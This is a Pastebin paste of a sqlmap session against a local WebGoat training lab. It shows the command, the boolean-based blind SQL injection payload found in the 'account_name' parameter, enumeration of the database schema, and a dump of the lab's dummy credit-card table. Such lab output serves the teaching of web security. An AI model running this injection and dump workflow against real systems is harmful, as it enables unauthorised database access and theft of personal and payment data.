API tools faq
paste
Guest User

Untitled

a guest
Oct 13th, 2015
496
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.51 KB | None | 0 0
raw download clone embed print report
  1. $ python sqlmap.py -r webgoat.req --current-user --tables --columns -T user_data -D public --dbs --fresh-queries --safe-url "http://localhost:8080/WebGoat/service/restartlesson.mvc" --safe-freq=1 --flush-session --technique=B --dump
  2. _
  3. ___ ___| |_____ ___ ___ {1.0-dev-48619d9}
  4. |_ -| . | | | .'| . |
  5. |___|_ |_|_|_|_|__,| _|
  6. |_| |_| http://sqlmap.org
  7.  
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9.  
  10. [*] starting at 12:59:57
  11.  
  12. [12:59:57] [INFO] parsing HTTP request from 'webgoat.req'
  13. [12:59:57] [INFO] flushing session file
  14. [12:59:57] [INFO] testing connection to the target URL
  15. [12:59:57] [INFO] heuristics detected web page charset 'ascii'
  16. [12:59:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  17. [12:59:57] [INFO] testing if the target URL is stable
  18. [12:59:58] [INFO] target URL is stable
  19. [12:59:58] [INFO] testing if POST parameter 'account_name' is dynamic
  20. [12:59:58] [INFO] confirming that POST parameter 'account_name' is dynamic
  21. [12:59:58] [INFO] POST parameter 'account_name' is dynamic
  22. [12:59:58] [INFO] heuristic (basic) test shows that POST parameter 'account_name' might be injectable (possible DBMS: 'HSQLDB')
  23. [12:59:58] [INFO] heuristic (XSS) test shows that POST parameter 'account_name' might be vulnerable to XSS attacks
  24. [12:59:58] [INFO] testing for SQL injection on POST parameter 'account_name'
  25. it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
  26. for the remaining tests, do you want to include all tests for 'HSQLDB' extending provided level (1) and risk (1) values? [Y/n]
  27. [12:59:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  28. [12:59:59] [WARNING] reflective value(s) found and filtering out
  29. [12:59:59] [INFO] POST parameter 'account_name' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
  30. [12:59:59] [INFO] checking if the injection point on POST parameter 'account_name' is a false positive
  31. POST parameter 'account_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
  32. sqlmap identified the following injection point(s) with a total of 15 HTTP(s) requests:
  33. ---
  34. Parameter: account_name (POST)
  35. Type: boolean-based blind
  36. Title: AND boolean-based blind - WHERE or HAVING clause
  37. Payload: account_name=Smith' AND 3939=3939 AND 'NMwC'='NMwC&SUBMIT=Go!
  38. ---
  39. [12:59:59] [INFO] testing HSQLDB
  40. [12:59:59] [INFO] confirming HSQLDB
  41. [12:59:59] [INFO] the back-end DBMS is HSQLDB
  42. [12:59:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  43. [12:59:59] [INFO] retrieved:
  44. back-end DBMS: HSQLDB >= 1.7.2 and < 1.8.0
  45. [13:00:00] [INFO] fetching current user
  46. [13:00:00] [INFO] retrieved: SA
  47. current user: 'SA'
  48. [13:00:01] [INFO] fetching database names
  49. [13:00:01] [INFO] fetching number of databases
  50. [13:00:01] [INFO] retrieved: 2
  51. [13:00:01] [INFO] retrieved: INFORMATION_SCHEMA
  52. [13:00:02] [INFO] retrieved: PUBLIC
  53. available databases [2]:
  54. [*] INFORMATION_SCHEMA
  55. [*] PUBLIC
  56.  
  57. [13:00:02] [INFO] fetching tables for database: 'PUBLIC'
  58. [13:00:02] [INFO] fetching number of tables for database 'PUBLIC'
  59. [13:00:02] [INFO] retrieved: 16
  60. [13:00:02] [INFO] retrieved: AUTH
  61. [13:00:02] [INFO] retrieved: EMPLOYEE
  62. [13:00:03] [INFO] retrieved: MESSAGES
  63. [13:00:03] [INFO] retrieved: MFE_IMAGES
  64. [13:00:04] [INFO] retrieved: OWNERSHIP
  65. [13:00:04] [INFO] retrieved: PINS
  66. [13:00:05] [INFO] retrieved: PRODUCT_SYSTEM_DATA
  67. [13:00:06] [INFO] retrieved: ROLES
  68. [13:00:06] [INFO] retrieved: SALARIES
  69. [13:00:06] [INFO] retrieved: TAN
  70. [13:00:07] [INFO] retrieved: TRANSACTIONS
  71. [13:00:07] [INFO] retrieved: USER_DATA
  72. [13:00:08] [INFO] retrieved: USER_DATA_TAN
  73. [13:00:08] [INFO] retrieved: USER_LOGIN
  74. [13:00:09] [INFO] retrieved: USER_SYSTEM_DATA
  75. [13:00:09] [INFO] retrieved: WEATHER_DATA
  76. Database: PUBLIC
  77. [16 tables]
  78. +---------------------+
  79. | AUTH |
  80. | EMPLOYEE |
  81. | MESSAGES |
  82. | MFE_IMAGES |
  83. | OWNERSHIP |
  84. | PINS |
  85. | PRODUCT_SYSTEM_DATA |
  86. | ROLES |
  87. | SALARIES |
  88. | TAN |
  89. | TRANSACTIONS |
  90. | USER_DATA |
  91. | USER_DATA_TAN |
  92. | USER_LOGIN |
  93. | USER_SYSTEM_DATA |
  94. | WEATHER_DATA |
  95. +---------------------+
  96.  
  97. [13:00:10] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
  98. [13:00:10] [INFO] retrieved: 7
  99. [13:00:10] [INFO] retrieved: CC_NUMBER
  100. [13:00:11] [INFO] retrieved: CC_NUMBER
  101. [13:00:11] [INFO] retrieved: CC_TYPE
  102. [13:00:12] [INFO] retrieved: CC_TYPE
  103. [13:00:13] [INFO] retrieved: COOKIE
  104. [13:00:13] [INFO] retrieved: COOKIE
  105. [13:00:14] [INFO] retrieved: FIRST_NAME
  106. [13:00:14] [INFO] retrieved: FIRST_NAME
  107. [13:00:15] [INFO] retrieved: LAST_NAME
  108. [13:00:16] [INFO] retrieved: LAST_NAME
  109. [13:00:16] [INFO] retrieved: LOGIN_COUNT
  110. [13:00:17] [INFO] retrieved: LOGIN_COUNT
  111. [13:00:18] [INFO] retrieved: USERID
  112. [13:00:19] [INFO] retrieved: USERID
  113. Database: PUBLIC
  114. Table: USER_DATA
  115. [7 columns]
  116. +-------------+-------------+
  117. | Column | Type |
  118. +-------------+-------------+
  119. | CC_NUMBER | CC_NUMBER |
  120. | CC_TYPE | CC_TYPE |
  121. | COOKIE | COOKIE |
  122. | FIRST_NAME | FIRST_NAME |
  123. | LAST_NAME | LAST_NAME |
  124. | LOGIN_COUNT | LOGIN_COUNT |
  125. | USERID | USERID |
  126. +-------------+-------------+
  127.  
  128. [13:00:19] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
  129. [13:00:19] [INFO] retrieved: 7
  130. [13:00:19] [INFO] retrieved: CC_NUMBER
  131. [13:00:20] [INFO] retrieved: CC_TYPE
  132. [13:00:21] [INFO] retrieved: COOKIE
  133. [13:00:21] [INFO] retrieved: FIRST_NAME
  134. [13:00:22] [INFO] retrieved: LAST_NAME
  135. [13:00:22] [INFO] retrieved: LOGIN_COUNT
  136. [13:00:23] [INFO] retrieved: USERID
  137. [13:00:24] [INFO] fetching entries for table 'USER_DATA' in database 'PUBLIC'
  138. [13:00:24] [INFO] fetching number of entries for table 'USER_DATA' in database 'PUBLIC'
  139. [13:00:24] [INFO] retrieved: 13
  140. [13:00:24] [INFO] retrieved: 13
  141. [13:00:24] [INFO] retrieved: 13
  142. [13:00:24] [INFO] retrieved: 13
  143. [13:00:24] [INFO] retrieved: 13
  144. [13:00:24] [INFO] retrieved: 13
  145. [13:00:25] [INFO] retrieved: 13
  146. [13:00:25] [INFO] retrieved: 13
  147. [13:00:25] [INFO] retrieved: 33843453533
  148. [13:00:25] [INFO] retrieved: AMEX
  149. [13:00:26] [INFO] retrieved:
  150. [13:00:26] [INFO] retrieved: Joesph
  151. [13:00:26] [INFO] retrieved: Something
  152. [13:00:27] [INFO] retrieved: 0
  153. [13:00:27] [INFO] retrieved: 15613
  154. [13:00:27] [INFO] retrieved: 338893453333
  155. [13:00:28] [INFO] retrieved: AMEX
  156. [13:00:28] [INFO] retrieved:
  157. [13:00:28] [INFO] retrieved: Peter
  158. [13:00:28] [INFO] retrieved: Sand
  159. [13:00:29] [INFO] retrieved: 0
  160. [13:00:29] [INFO] retrieved: 15603
  161. [13:00:29] [INFO] retrieved: 123609789
  162. [13:00:29] [INFO] retrieved: MC
  163. [13:00:30] [INFO] retrieved:
  164. [13:00:30] [INFO] retrieved: Peter
  165. [13:00:30] [INFO] retrieved: Sand
  166. [13:00:30] [INFO] retrieved: 0
  167. [13:00:30] [INFO] retrieved: 15603
  168. [13:00:31] [INFO] retrieved: 33413003333
  169. [13:00:31] [INFO] retrieved: AMEX
  170. [13:00:31] [INFO] retrieved:
  171. [13:00:32] [INFO] retrieved: Grumpy
  172. [13:00:32] [INFO] retrieved: youaretheweakestlink
  173. [13:00:33] [INFO] retrieved: 0
  174. [13:00:33] [INFO] retrieved: 10323
  175. [13:00:33] [INFO] retrieved: 673834489
  176. [13:00:34] [INFO] retrieved: MC
  177. [13:00:34] [INFO] retrieved:
  178. [13:00:34] [INFO] retrieved: Grumpy
  179. [13:00:34] [INFO] retrieved: youaretheweakestlink
  180. [13:00:35] [INFO] retrieved: 0
  181. [13:00:36] [INFO] retrieved: 10323
  182. [13:00:36] [INFO] retrieved: 333300003333
  183. [13:00:36] [INFO] retrieved: AMEX
  184. [13:00:37] [INFO] retrieved:
  185. [13:00:37] [INFO] retrieved: Jolly
  186. [13:00:37] [INFO] retrieved: Hershey
  187. [13:00:37] [INFO] retrieved: 0
  188. [13:00:38] [INFO] retrieved: 10312
  189. [13:00:38] [INFO] retrieved: 176896789
  190. [13:00:38] [INFO] retrieved: MC
  191. [13:00:38] [INFO] retrieved:
  192. [13:00:39] [INFO] retrieved: Jolly
  193. [13:00:39] [INFO] retrieved: Hershey
  194. [13:00:39] [INFO] retrieved: 0
  195. [13:00:39] [INFO] retrieved: 10312
  196. [13:00:40] [INFO] retrieved: 333498703333
  197. [13:00:40] [INFO] retrieved: AMEX
  198. [13:00:41] [INFO] retrieved:
  199. [13:00:41] [INFO] retrieved: Jane
  200. [13:00:41] [INFO] retrieved: Plane
  201. [13:00:41] [INFO] retrieved: 0
  202. [13:00:41] [INFO] retrieved: 103
  203. [13:00:41] [INFO] retrieved: 123456789
  204. [13:00:42] [INFO] retrieved: MC
  205. [13:00:42] [INFO] retrieved:
  206. [13:00:42] [INFO] retrieved: Jane
  207. [13:00:42] [INFO] retrieved: Plane
  208. [13:00:43] [INFO] retrieved: 0
  209. [13:00:43] [INFO] retrieved: 103
  210. [13:00:43] [INFO] retrieved: 4352209902222
  211. [13:00:44] [INFO] retrieved: AMEX
  212. [13:00:44] [INFO] retrieved:
  213. [13:00:44] [INFO] retrieved: John
  214. [13:00:44] [INFO] retrieved: Smith
  215. [13:00:45] [INFO] retrieved: 0
  216. [13:00:45] [INFO] retrieved: 102
  217. [13:00:45] [INFO] retrieved: 2435600002222
  218. [13:00:46] [INFO] retrieved: MC
  219. [13:00:46] [INFO] retrieved:
  220. [13:00:46] [INFO] retrieved: John
  221. [13:00:46] [INFO] retrieved: Smith
  222. [13:00:46] [INFO] retrieved: 0
  223. [13:00:46] [INFO] retrieved: 102
  224. [13:00:47] [INFO] retrieved: 2234200065411
  225. [13:00:47] [INFO] retrieved: MC
  226. [13:00:47] [INFO] retrieved:
  227. [13:00:48] [INFO] retrieved: Joe
  228. [13:00:48] [INFO] retrieved: Snow
  229. [13:00:48] [INFO] retrieved: 0
  230. [13:00:48] [INFO] retrieved: 101
  231. [13:00:48] [INFO] retrieved: 987654321
  232. [13:00:49] [INFO] retrieved: VISA
  233. [13:00:49] [INFO] retrieved:
  234. [13:00:49] [INFO] retrieved: Joe
  235. [13:00:49] [INFO] retrieved: Snow
  236. [13:00:50] [INFO] retrieved: 0
  237. [13:00:50] [INFO] retrieved: 101
  238. [13:00:50] [INFO] analyzing table dump for possible password hashes
  239. Database: PUBLIC
  240. Table: USER_DATA
  241. [13 entries]
  242. +--------+--------+---------+----------------------+---------------+------------+-------------+
  243. | USERID | COOKIE | CC_TYPE | LAST_NAME | CC_NUMBER | FIRST_NAME | LOGIN_COUNT |
  244. +--------+--------+---------+----------------------+---------------+------------+-------------+
  245. | 15613 | NULL | AMEX | Something | 33843453533 | Joesph | 0 |
  246. | 15603 | NULL | AMEX | Sand | 338893453333 | Peter | 0 |
  247. | 15603 | NULL | MC | Sand | 123609789 | Peter | 0 |
  248. | 10323 | NULL | AMEX | youaretheweakestlink | 33413003333 | Grumpy | 0 |
  249. | 10323 | NULL | MC | youaretheweakestlink | 673834489 | Grumpy | 0 |
  250. | 10312 | NULL | AMEX | Hershey | 333300003333 | Jolly | 0 |
  251. | 10312 | NULL | MC | Hershey | 176896789 | Jolly | 0 |
  252. | 103 | NULL | AMEX | Plane | 333498703333 | Jane | 0 |
  253. | 103 | NULL | MC | Plane | 123456789 | Jane | 0 |
  254. | 102 | NULL | AMEX | Smith | 4352209902222 | John | 0 |
  255. | 102 | NULL | MC | Smith | 2435600002222 | John | 0 |
  256. | 101 | NULL | MC | Snow | 2234200065411 | Joe | 0 |
  257. | 101 | NULL | VISA | Snow | 987654321 | Joe | 0 |
  258. +--------+--------+---------+----------------------+---------------+------------+-------------+
  259.  
  260. [13:00:50] [INFO] table 'PUBLIC.USER_DATA' dumped to CSV file '/home/stamparm/.sqlmap/output/localhost/dump/PUBLIC/USER_DATA.csv'
  261. [13:00:50] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/localhost'
  262.  
  263. [*] shutting down at 13:00:50
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!